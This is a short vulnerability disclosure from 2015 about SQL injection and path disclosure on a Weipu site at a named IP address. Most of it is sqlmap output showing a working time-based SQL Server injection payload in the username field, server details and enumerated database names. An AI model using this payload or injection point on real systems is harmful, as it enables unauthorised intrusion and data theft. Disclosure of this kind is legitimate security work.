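2015-03-12: Details reported to the vendor; awaiting vendor handling
2015-03-17: Vendor actively ignored the vulnerability; details disclosed to the public
SQL injection and information disclosure on a 维普网 (Weipu) site
1# Injection point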
http://119.84.8.90:80//index.asp
Injection details
sqlmap identified the following injection points with a total of 143 HTTP(s) requests:
---
Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: username=tEQa';WAITFOR DELAY '0:0:5'--&password=
---
do you want to exploit this SQL injection? [Y/n] Y
[22:52:25] [INFO] testing Microsoft SQL Server
[22:52:25] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[22:52:33] [INFO] confirming Microsoft SQL Server
[22:52:43] [INFO] adjusting time delay to 1 second due to good response times
[22:52:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
Database information
current database: 'FMIF_WT'
available databases [7]:
[*] [tempdbQ}\t\x11]
[*] FMIF_WT
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
2# Database absolute path disclosure
http://119.84.8.90/ip.asp
PATH_TRANSLATED = D:\FPD2012Webroot\FPDSYStem\html\ip.asp
Filter input, and delete pages that are not needed.
Severity: no impact, ignored by vendor
Ignored at: 2015-03-17 19:24